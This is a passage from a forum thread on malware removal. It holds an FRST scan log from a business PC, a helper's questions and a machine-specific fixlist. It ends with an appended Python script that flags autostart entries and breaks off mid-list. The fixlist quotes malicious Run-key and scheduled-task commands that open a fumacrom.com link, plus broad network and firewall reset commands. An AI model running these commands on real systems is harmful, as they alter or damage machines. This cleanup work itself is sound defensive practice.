2021-12-27 09:02 - 2021-12-27 09:02 - 000002285 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-12-27 09:01 - 2021-12-27 09:01 - 001341272 _____ (Google LLC) C:\Users\Spices\Downloads\ChromeSetup.exe
2021-12-27 07:34 - 2021-12-27 09:00 - 000000000 ____D C:\ProgramData\Mozilla
2021-12-27 07:34 - 2021-12-27 09:00 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-12-27 07:34 - 2021-12-27 08:37 - 000000000 ____D C:\Users\Spices\AppData\LocalLow\Mozilla
2021-12-27 07:34 - 2021-12-27 07:34 - 000333824 _____ (Mozilla) C:\Users\Spices\Downloads\Firefox Installer.exe
2021-12-27 07:34 - 2021-12-27 07:34 - 000000000 ____D C:\Users\Spices\AppData\Roaming\Mozilla
2021-12-27 07:34 - 2021-12-27 07:34 - 000000000 ____D C:\Users\Spices\AppData\Local\Mozilla
2021-12-24 11:42 - 2021-12-24 11:42 - 000092727 _____ C:\Users\Spices\Downloads\elmo 0231188.pdf
2021-12-24 11:42 - 2021-12-24 11:42 - 000091973 _____ C:\Users\Spices\Downloads\elmo 0231189.pdf
2021-12-24 11:41 - 2021-12-24 11:41 - 000178398 _____ C:\Users\Spices\Downloads\archive.zip
2021-12-23 11:37 - 2021-12-23 11:37 - 000143469 _____ C:\Users\Spices\Downloads\179Purchase Orders (4).pdf
2021-12-23 11:14 - 2021-12-23 11:14 - 000040389 _____ C:\Users\Spices\Downloads\4382_001.pdf
2021-12-23 08:12 - 2021-12-23 08:12 - 002105837 _____ C:\Users\Spices\Downloads\CUSMA EL MONTE DEC 22-2021-25603.pdf
2021-12-23 07:53 - 2021-12-23 07:53 - 000029408 _____ C:\Users\Spices\Downloads\po_lspo (27).pdf
2021-12-23 07:51 - 2021-12-23 07:51 - 000003251 _____ C:\Users\Spices\Downloads\34980668.pdf
2021-12-22 07:51 - 2021-12-14 07:44 - 000381456 _____ (Google, Inc.) C:\WINDOWS\system32\Drivers\googledrivefs3688.sys
2021-12-21 09:28 - 2021-12-21 09:28 - 000075524 _____ C:\Users\Spices\Downloads\MyFDA_Compliance_Status_Report (1).pdf
2021-12-21 08:10 - 2021-12-21 08:10 - 000000000 ____D C:\Users\Spices\Doctor Web
2021-12-21 08:09 - 2021-12-21 08:10 - 263216616 _____ C:\Users\Spices\Downloads\or80g9pk.exe
2021-12-20 10:39 - 2021-12-20 10:39 - 000142838 _____ C:\Users\Spices\Downloads\179Purchase Orders (1) (1).pdf
2021-12-20 07:59 - 2021-12-20 07:59 - 000044213 _____ C:\Users\Spices\Downloads\4178_001.pdf
2021-12-17 10:45 - 2021-12-17 10:45 - 000078402 _____ C:\Users\Spices\Downloads\INV#5500 El Monte Spices.pdf
2021-12-17 09:52 - 2021-12-17 09:52 - 000005669 _____ C:\Users\Spices\Downloads\PO536024.xlsx
2021-12-17 09:50 - 2021-12-17 09:50 - 000003222 _____ C:\Users\Spices\Downloads\34960113.pdf
2021-12-17 09:36 - 2021-12-17 09:36 - 000003862 _____ C:\WINDOWS\system32\Tasks\EOSv3 Scheduler onLogOn
2021-12-17 09:36 - 2021-12-17 09:36 - 000003420 _____ C:\WINDOWS\system32\Tasks\EOSv3 Scheduler onTime
2021-12-17 08:30 - 2021-12-17 08:31 - 000001430 _____ C:\Users\Spices\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ESET Online Scanner.lnk
2021-12-17 08:30 - 2021-12-17 08:30 - 013311448 _____ (ESET) C:\Users\Spices\Downloads\esetonlinescanner.exe
2021-12-16 12:20 - 2021-12-16 12:20 - 000420919 _____ C:\Users\Spices\Downloads\EL MONTE INV # 8348 PO# 2729.pdf
2021-12-16 12:20 - 2021-12-16 12:20 - 000386913 _____ C:\Users\Spices\Downloads\EL MONTE INV # 8357 PO# 2279.pdf
2021-12-16 12:18 - 2021-12-16 12:18 - 000035717 _____ C:\Users\Spices\Downloads\po_lspo (26).pdf
2021-12-16 08:40 - 2021-12-16 08:40 - 000000000 ____D C:\WINDOWS\AutoKMS
2021-12-16 08:15 - 2021-12-16 08:15 - 003291800 _____ (Nicolas Coolman) C:\Users\Spices\Downloads\ZHPCleaner.exe
2021-12-16 08:12 - 2021-12-16 08:13 - 000000000 ____D C:\AdwCleaner
2021-12-16 08:11 - 2021-12-16 08:11 - 008540344 _____ (Malwarebytes) C:\Users\Spices\Downloads\adwcleaner_8.3.1.exe
2021-12-15 11:31 - 2021-12-15 11:31 - 000148659 _____ C:\Users\Spices\Downloads\420560 (1).pdf
2021-12-15 11:24 - 2021-12-15 11:24 - 000191516 _____ C:\Users\Spices\Downloads\Certificate_124.pdf
2021-12-15 10:33 - 2021-12-15 10:33 - 000017100 _____ C:\Users\Spices\Downloads\po_lspo (25).pdf
2021-12-15 09:16 - 2021-12-15 09:16 - 000240391 _____ C:\Users\Spices\Downloads\277486680007_CT.pdf
2021-12-15 09:16 - 2021-12-15 09:16 - 000172338 _____ C:\Users\Spices\Downloads\277486680007_FSV.pdf
2021-12-15 09:16 - 2021-12-15 09:16 - 000150024 _____ C:\Users\Spices\Downloads\Resized_Resized_20211215_065921(1).jpeg
2021-12-15 09:03 - 2021-12-15 09:03 - 000610756 _____ C:\Users\Spices\Downloads\8348.pdf
2021-12-15 08:30 - 2021-12-15 08:30 - 000934103 _____ C:\Users\Spices\Downloads\12-8-21 INVOICE# 9670.pdf
2021-12-15 08:14 - 2021-12-15 08:14 - 000000000 ____D C:\WINDOWS\SystemTemp
2021-12-15 05:31 - 2021-12-15 05:31 - 000223744 _____ C:\WINDOWS\SysWOW64\TpmTool.exe
2021-12-15 05:31 - 2021-12-15 05:31 - 000011979 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-12-15 05:30 - 2021-12-15 05:30 - 000272384 _____ C:\WINDOWS\system32\TpmTool.exe
2021-12-15 05:30 - 2021-12-15 05:30 - 000162816 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-12-15 05:22 - 2021-12-15 05:22 - 000000000 ___HD C:\$WinREAgent
2021-12-14 15:19 - 2021-12-14 15:19 - 000612556 _____ C:\Users\Spices\Downloads\8272 (1).pdf
2021-12-14 14:38 - 2021-12-14 14:38 - 000011060 _____ C:\Users\Spices\Downloads\Invoice_INV11832_1639510103249.pdf
2021-12-14 10:01 - 2021-12-14 10:01 - 000000000 ____D C:\Users\Spices\Documents\QBBackupTemp Tue, Dec 14 2021 10 01 00 AM
2021-12-14 07:55 - 2021-12-14 07:55 - 000005670 _____ C:\Users\Spices\Downloads\PO535511.xlsx
2021-12-13 21:51 - 2021-12-13 21:51 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1001776605-1151265979-3107129937-1001
2021-12-13 17:07 - 2021-12-13 17:07 - 000092388 _____ C:\Users\Spices\Downloads\elmo 0230901.pdf
2021-12-13 16:46 - 2021-12-13 16:46 - 000065834 _____ C:\Users\Spices\Downloads\Purchase  Order_19135_20211213_34800PM.pdf
2021-12-13 10:57 - 2021-12-13 10:57 - 000554654 _____ C:\Users\Spices\Downloads\invoice_elmontespices_.pdf
2021-12-13 09:47 - 2021-12-13 09:47 - 000148659 _____ C:\Users\Spices\Downloads\420560.pdf
2021-12-13 09:43 - 2021-12-13 09:44 - 000012951 _____ C:\Users\Spices\Downloads\El Monte - SO9604.pdf
2021-12-13 09:07 - 2021-12-13 09:07 - 000003253 _____ C:\Users\Spices\Downloads\34943559.pdf
2021-12-13 08:03 - 2021-12-16 08:40 - 000000000 ____D C:\Users\Spices\AppData\Roaming\ZHP
2021-12-13 08:03 - 2021-12-13 08:03 - 000000000 ____D C:\Users\Spices\AppData\Local\ZHP
2021-12-10 16:24 - 2021-12-10 16:24 - 000037294 _____ C:\Users\Spices\Downloads\po_lspo (24).pdf
2021-12-10 15:36 - 2021-12-10 15:36 - 000892261 _____ C:\Users\Spices\Downloads\11-10-21 invoice# 9526.pdf
2021-12-10 15:35 - 2021-12-10 15:35 - 004690510 _____ C:\Users\Spices\Downloads\11-9-21 invoice# 9550.pdf
2021-12-10 13:23 - 2021-12-10 13:23 - 000070057 _____ C:\Users\Spices\Downloads\Inv_32092_from_REHAN_SPICES_CORP_15692.pdf
2021-12-10 10:40 - 2021-12-10 10:40 - 000011033 _____ C:\Users\Spices\Downloads\Invoice_INV11665_1638922579023 (1).pdf
2021-12-10 08:23 - 2021-12-10 08:23 - 000001507 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2021-12-10 08:23 - 2021-12-10 08:23 - 000000000 ____D C:\WINDOWS\system32\Tasks\Safer-Networking
2021-12-10 08:23 - 2021-12-10 08:23 - 000000000 ____D C:\Users\Spices\AppData\Local\Safer-Networking Ltd
2021-12-10 08:23 - 2021-12-10 08:23 - 000000000 ____D C:\Safer-Networking Ltd
2021-12-10 08:23 - 2021-12-10 08:23 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2021-12-10 08:23 - 2019-06-21 08:34 - 000019904 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\Drivers\Spybot3ELAM.sys
2021-12-10 08:22 - 2021-12-10 08:50 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2021-12-10 08:22 - 2021-12-10 08:24 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2021-12-10 08:22 - 2018-02-06 19:04 - 000032168 _____ (Safer-Networking Ltd.) C:\WINDOWS\system32\sdnclean64.exe
2021-12-10 08:20 - 2021-12-10 08:21 - 069300040 _____ (Safer-Networking Ltd. ) C:\Users\Spices\Downloads\spybotsd-2.8.68.0.exe
2021-12-10 08:15 - 2021-12-10 08:15 - 000248992 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2021-12-10 08:15 - 2021-12-10 08:15 - 000160176 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2021-12-10 08:15 - 2021-12-10 08:15 - 000002036 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2021-12-10 08:15 - 2021-12-10 08:14 - 000019912 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2021-12-10 08:14 - 2021-12-30 08:53 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-12-10 08:14 - 2021-12-10 08:14 - 002101944 _____ (Malwarebytes) C:\Users\Spices\Downloads\MBSetup-119967.119967-consumer.exe
2021-12-10 08:14 - 2021-12-10 08:14 - 000000000 ____D C:\Program Files\Malwarebytes
2021-12-10 07:59 - 2021-12-17 08:30 - 000000000 ____D C:\Users\Spices\AppData\Local\ESET
2021-12-09 17:00 - 2021-12-09 17:00 - 000074620 _____ C:\Users\Spices\Downloads\Inv_31967_from_REHAN_SPICES_CORP_3800.pdf
2021-12-08 09:01 - 2021-12-08 09:01 - 000000000 ____D C:\Users\Spices\Documents\QBBackupTemp Wed, Dec 08 2021 09 01 00 AM
2021-12-07 18:36 - 2021-12-07 18:36 - 000011033 _____ C:\Users\Spices\Downloads\Invoice_INV11665_1638922579023.pdf
2021-12-07 17:21 - 2021-12-07 17:21 - 000560882 _____ C:\Users\Spices\Downloads\el monte inv.12.07.21.pdf
2021-12-07 14:36 - 2021-12-07 14:36 - 001084748 _____ C:\Users\Spices\Downloads\11-23-21  INVOICE# 9586.pdf
2021-12-07 14:36 - 2021-12-07 14:36 - 001050748 _____ C:\Users\Spices\Downloads\12-1-21  INVOICE# 9640.pdf
2021-12-07 14:36 - 2021-12-07 14:36 - 001050748 _____ C:\Users\Spices\Downloads\12-1-21  INVOICE# 9640 (1).pdf
2021-12-07 11:15 - 2021-12-07 11:15 - 000004757 _____ C:\Users\Spices\Downloads\EL MONTE SPICE INS ID CARD.pdf

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2022-01-06 08:34 - 2018-03-02 15:37 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2022-01-06 08:31 - 2019-12-07 01:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-01-06 08:24 - 2018-03-01 16:53 - 000000000 ____D C:\Program Files (x86)\Google
2022-01-06 07:52 - 2021-02-12 13:37 - 000000000 ____D C:\Program Files\CCleaner
2022-01-06 07:50 - 2020-11-13 09:16 - 000004170 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{30F58647-5ECA-4353-8E34-097FB582709F}
2022-01-06 07:47 - 2018-03-02 16:54 - 196280320 ____R C:\Users\Spices\Documents\EL MONTE ESPICES17 5-26-17.QBW.TLG
2022-01-06 07:47 - 2018-03-02 16:54 - 130564096 ____R C:\Users\Spices\Documents\EL MONTE ESPICES17 5-26-17.QBW
2022-01-05 17:12 - 2020-11-13 08:39 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-01-05 17:01 - 2020-04-24 09:46 - 000000000 ____D C:\Users\Spices\Documents\EL MONTE ESPICES17 5-26-17.QBW.SearchIndex
2022-01-05 11:01 - 2019-06-05 16:29 - 000000000 ____D C:\Users\Spices\Documents\QuickBooksAutoDataRecovery
2022-01-05 10:11 - 2019-06-05 16:29 - 000000391 _____ C:\Users\Spices\Documents\EL MONTE ESPICES17 5-26-17.QBW.DSN
2022-01-05 10:11 - 2018-11-21 21:45 - 000000434 _____ C:\Users\Spices\Documents\EL MONTE ESPICES17 5-26-17.QBW.ND
2022-01-05 09:24 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-01-04 09:36 - 2020-09-28 08:53 - 000000000 ____D C:\Users\Spices\Documents\DOC GENERALES
2022-01-03 10:47 - 2018-03-01 16:20 - 000000000 ____D C:\Users\Spices\AppData\Local\Packages
2021-12-30 10:07 - 2020-09-28 08:53 - 000161972 _____ C:\Users\Spices\Documents\DOCUMENTOS GENERALES.zip
2021-12-30 09:43 - 2020-11-13 08:57 - 000840602 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-12-30 09:43 - 2019-12-07 01:13 - 000000000 ____D C:\WINDOWS\INF
2021-12-30 09:36 - 2020-11-13 09:16 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-12-30 09:36 - 2020-11-13 08:38 - 000008192 ___SH C:\DumpStack.log.tmp
2021-12-30 09:28 - 2019-12-07 01:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2021-12-27 16:02 - 2018-07-04 13:58 - 000000000 ____D C:\Users\Spices\AppData\Local\CrashDumps
2021-12-27 09:02 - 2018-05-14 20:05 - 000000000 ____D C:\Users\Spices\AppData\Local\Google
2021-12-27 09:02 - 2018-03-23 02:00 - 000000000 ____D C:\Program Files\Google
2021-12-27 09:00 - 2020-07-15 16:46 - 000002395 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2021-12-27 07:36 - 2020-07-15 16:46 - 000002557 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-12-22 07:56 - 2019-12-07 01:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-12-22 07:51 - 2021-09-01 09:55 - 000002060 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive.lnk
2021-12-22 07:51 - 2021-09-01 09:55 - 000001902 _____ C:\Users\Default\Desktop\Google Slides.lnk
2021-12-22 07:51 - 2021-09-01 09:55 - 000001902 _____ C:\Users\Default\Desktop\Google Sheets.lnk
2021-12-22 07:51 - 2021-09-01 09:55 - 000001890 _____ C:\Users\Default\Desktop\Google Docs.lnk
2021-12-21 08:27 - 2020-11-13 08:44 - 000000000 ____D C:\Users\Spices
2021-12-20 08:01 - 2018-03-01 17:16 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2021-12-17 09:39 - 2020-11-13 08:44 - 000000000 ____D C:\Users\QBDataServiceUser27
2021-12-17 08:37 - 2021-03-08 07:19 - 000000000 ____D C:\Program Files (x86)\CCleaner Browser
2021-12-15 09:39 - 2021-05-08 06:24 - 000000000 ____D C:\Program Files\HPPrintScanDoctor
2021-12-15 08:23 - 2020-12-07 07:07 - 000635136 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-12-15 08:14 - 2019-12-07 01:54 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-12-15 08:14 - 2019-12-07 01:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-12-15 05:33 - 2019-12-07 01:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-12-15 05:17 - 2018-03-01 17:33 - 137938848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-12-15 05:17 - 2018-03-01 17:33 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-12-13 07:53 - 2020-11-30 01:10 - 000003386 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6b9ddce3298dc
2021-12-13 07:53 - 2020-11-13 09:16 - 000003480 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-12-10 09:32 - 2019-12-07 01:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2021-12-10 08:26 - 2020-11-13 09:36 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.004
2021-12-10 08:26 - 2020-11-13 09:35 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.003
2021-12-10 08:26 - 2020-11-13 09:24 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.002
2021-12-10 08:26 - 2020-11-13 09:22 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.001
2021-12-10 08:26 - 2020-11-13 09:20 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.000
2021-12-10 08:26 - 2020-11-13 09:20 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923
2021-12-10 08:26 - 2020-11-13 09:19 - 000000000 ____D C:\Users\TEMP
2021-12-10 08:15 - 2019-12-07 01:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-12-10 07:51 - 2018-03-02 15:37 - 000000000 ____D C:\Users\Spices\AppData\Roaming\TeamViewer
2021-12-07 03:13 - 2018-05-14 20:25 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd

==================== Files in the root of some directories ========

2019-06-24 19:37 - 2019-06-26 22:18 - 000000000 _____ () C:\Users\Spices\AppData\Roaming\MCVi2UserDetail.ini
2018-11-21 21:42 - 2021-06-03 17:22 - 000269070 _____ () C:\Users\Spices\AppData\Roaming\QBFileDrTool_DESKTOP-RLQ6923.log

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================
1 like

Thank you very much for your help and for following up. The reports are there; I'll be watching for your reply! Regards!

3 likes

Hi, I'm looking at it.

You'll have it shortly, @hectordj69

Regards.

3 likes

Hi @hectordj69, I'm finally here…

Good :+1:, so let's continue…

:zero: QUESTIONS

Which antivirus are you currently using on the machine?

I see there are remnants of AVAST and McAfee. You also have AVG, Windows Defender, ESET and Spybot - Search and Destroy. Tell me more about all this.

Do you recognize these user accounts on the machine? They are:

QBDataServiceUser27 (S-1-5-21-1001776605-1151265979-3107129937-1002 - Limited - Enabled) => C:\Users\TEMP.DESKTOP-RLQ6923.005
Spices (S-1-5-21-1001776605-1151265979-3107129937-1001 - Administrator - Enabled) => C:\Users\Spices

Do you recognize these programs on the machine? Did you install them yourself? They are:

DesignPro 5.4 Limited Edition (HKLM-x32\...\InstallShield_{71F6DF7D-B639-4FAD-BA93-E6DF267AA44D}) (Version: 5.2.1201 - Avery Dennison)
JeRM Process Viewer 1.1.0.3 (HKLM-x32\...\JeRM Process Viewer_is1) (Version:  - )
MSRX (HKLM-x32\...\MSRXv2017) (Version: v2017 - )
RepairSolutions (HKLM-x32\...\{94FA6651-E735-48D4-950A-93291C14DB63}) (Version: 3.0.19 - Innova Electronics)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.8.68.0 - Safer-Networking Ltd.)
Winmail Reader 1.2.15 (HKLM-x32\...\Winmail Reader_is1) (Version:  - Kopf)
JAR File Opener -> C:\Program Files\WindowsApps\62307pauljohn.JARFileOpener_1.2.0.0_neutral__7sv5v3m8wq0b2 [2018-04-16] (pauljohn)

:one: Now you must make a BACKUP OF THE REGISTRY. To do so:

  • Restart the computer in Normal Mode.

  • Download DelFix to your desktop.

  • Double-click to run it. (If you use Windows Vista/7/8 or 10, right-click and select Run as Administrator.)

  • Tick only the Create registry backup box and make sure the rest are not selected.

  • Click Run.

The report (DelFix.txt) will open; you can close it. But keep it in case I ask for it or it is needed in the future.

Next, CLOSE ALL PROGRAMS, go to Start >> Run and type Notepad.exe

  • Now copy and paste the codes/lines inside the box below into Notepad.
START
SystemRestore: On
CREATERESTOREPOINT:
CLOSEPROCESSES:
Folder: C:\program files\avast software\avast
Folder: C:\WINDOWS\AutoKMS
Folder: C:\Program Files\Common Files\AV\
Folder: C:\Program Files\Common Files\McAfee
Folder: C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{30F58647-5ECA-4353-8E34-097FB582709F}
File: C:\Users\Spices\Downloads\or80g9pk.exe

HKLM\...\Run: [HotKeysCmds] => "C:\WINDOWS\system32\hkcmd.exe" (No File)
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [prueba] => C:\Windows\System32\cmd.exe /c start hxxp://fumacrom.com/2OEsQ & start chrome.exe hxxp://fumacrom.com/2OEsQ & exit
BootExecute: autocheck autochk * sdnclean64.exe
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {0C42F339-DE3B-4B39-9229-AD7686DAE33C} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe /prepare (No File)
Task: {3C9BEDBE-D3A6-446B-AAED-540A66B14AD2} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe /platui /runkey (No File)
Task: {A559BF25-2AD5-4E2C-A24F-6C68836C60B9} - System32\Tasks\TAREAAA => C:\Windows\System32\cmd.exe /c start http://fumacrom.com/2OEsQ & start chrome.exe http://fumacrom.com/2OEsQ & exit <==== ATTENTION
Edge Notifications: HKU\S-1-5-21-1001776605-1151265979-3107129937-1001 -> hxxps://www.cvvshop.lv; hxxps://mail.google.com
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
AlternateDataStreams: C:\Users\Spices\Documents\para norma.jpeg:3or4kl4x13tuuug3Byamue2s4b [105]
AlternateDataStreams: C:\Users\Spices\Documents\para norma.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Spices\Documents\tapiascan.jpeg:3or4kl4x13tuuug3Byamue2s4b [105]
AlternateDataStreams: C:\Users\Spices\Documents\tapiascan.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\98963565.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\98963565.sys => ""="Driver"
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\StartupApproved\Run: => "prueba"
FirewallRules: [{CFF24E33-06E2-417A-ADE7-E746B0359CBB}] => (Allow) LPort=5357
FirewallRules: [TCP Query User{324995A9-4E1D-4924-9EED-3526411D4278}C:\program files\avast software\avast\avastui.exe] => (Block) C:\program files\avast software\avast\avastui.exe => No File
FirewallRules: [UDP Query User{01061E88-0E48-41BF-BFF0-4645F1032548}C:\program files\avast software\avast\avastui.exe] => (Block) C:\program files\avast software\avast\avastui.exe => No File
C:\program files\avast software\avast
C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe
2021-12-16 08:40 - 2021-12-16 08:40 - 000000000 ____D C:\WINDOWS\AutoKMS
2021-12-15 05:22 - 2021-12-15 05:22 - 000000000 ___HD C:\$WinREAgent

CMD: ipconfig /flushdns
CMD: ipconfig /renew
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
RemoveProxy:
EmptyTemp:
Hosts:
END

Save it with the name FIXLIST.TXT on your desktop (VERY IMPORTANT). Otherwise the SCRIPT will not work: both files (FRST.exe and FIXLIST.TXT) must be located on the DESKTOP.

:warning: The repair script above is customized for the specific machine it was made for and was written specifically by a Staff member. If you have a similar problem, please open your own topic to receive personalized, specific help. Using scripts made for other systems can cause serious damage to your computer.

Finally (NOTE: in NORMAL MODE):

  1. Run FRST.exe again (if you use Windows Vista/7/8 or 10, right-click and select Run as Administrator).

  2. Click Fix/Corregir and wait for the process to finish. Do not do anything with the PC while it is carrying out the repairs, even if it appears to have frozen. Leave it alone and wait.

  3. When it finishes, the file FIXLOG.TXT will be created on the DESKTOP; bring it in your next reply.

  4. Restart the computer in Normal Mode, check how it runs for a while, and tell us how the originally reported problem is doing.

:warning: Very Important :warning: Post the report I asked for as shown in the following image:

Regards.

P.S.: Don't be surprised if I take a while to reply; I have very little time for the forum and that's normal. But we will follow the case through to the end.

1 like
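
As an added example (not part of the original post and not FRST's own code), a short Python triage of the autostart lines that appear in the fixlist above: it flags Run-key and scheduled-task entries whose command uses cmd.exe to open a URL, and entries whose target is missing ("(No File)"). The function names and the two reason labels are assumptions of this sketch; the sample lines are taken from the fixlist, with the URLs defanged.

```python
import re

# FRST-style autostart lines: registry Run values and scheduled tasks.
RUN_RE = re.compile(r"^(HK(?:LM|U)[^:]*\\Run): \[([^\]]+)\] => (.*)$")
TASK_RE = re.compile(r"^Task: \{[0-9A-Fa-f-]+\} - (.+?) => (.*)$")
URL_RE = re.compile(r'\bh(?:tt|xx)ps?://[^\s&"]+', re.I)  # live or defanged
SHELL_RE = re.compile(r"\bcmd\.exe\b.*?\s/c\s", re.I)

def parse_entry(line):
    """Return (kind, name, command) for a Run or Task line, else None."""
    line = line.strip().replace("<==== ATTENTION", "").rstrip()
    m = RUN_RE.match(line)
    if m:
        return ("run", m.group(2), m.group(3))
    m = TASK_RE.match(line)
    if m:
        return ("task", m.group(1).rsplit("\\", 1)[-1], m.group(2))
    return None

def triage(lines):
    """Flag autostart entries that open a URL via cmd.exe or lack a target."""
    findings = []
    for line in lines:
        entry = parse_entry(line)
        if entry is None:
            continue
        kind, name, cmd = entry
        urls = sorted(set(URL_RE.findall(cmd)))
        reasons = []
        if urls and SHELL_RE.search(cmd):
            reasons.append("shell-opens-url")   # label is this sketch's own
        if cmd.endswith("(No File)"):
            reasons.append("orphaned-target")   # label is this sketch's own
        if reasons:
            findings.append({"kind": kind, "name": name, "reasons": reasons, "urls": urls})
    return findings

# Sample lines taken from the fixlist in the post above, URLs defanged.
SAMPLE = [
    r'HKLM\...\Run: [HotKeysCmds] => "C:\WINDOWS\system32\hkcmd.exe" (No File)',
    r'HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [prueba] => C:\Windows\System32\cmd.exe /c start hxxp://fumacrom.com/2OEsQ & start chrome.exe hxxp://fumacrom.com/2OEsQ & exit',
    r'Task: {3C9BEDBE-D3A6-446B-AAED-540A66B14AD2} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe /platui /runkey (No File)',
    r'Task: {A559BF25-2AD5-4E2C-A24F-6C68836C60B9} - System32\Tasks\TAREAAA => C:\Windows\System32\cmd.exe /c start hxxp://fumacrom.com/2OEsQ & start chrome.exe hxxp://fumacrom.com/2OEsQ & exit <==== ATTENTION',
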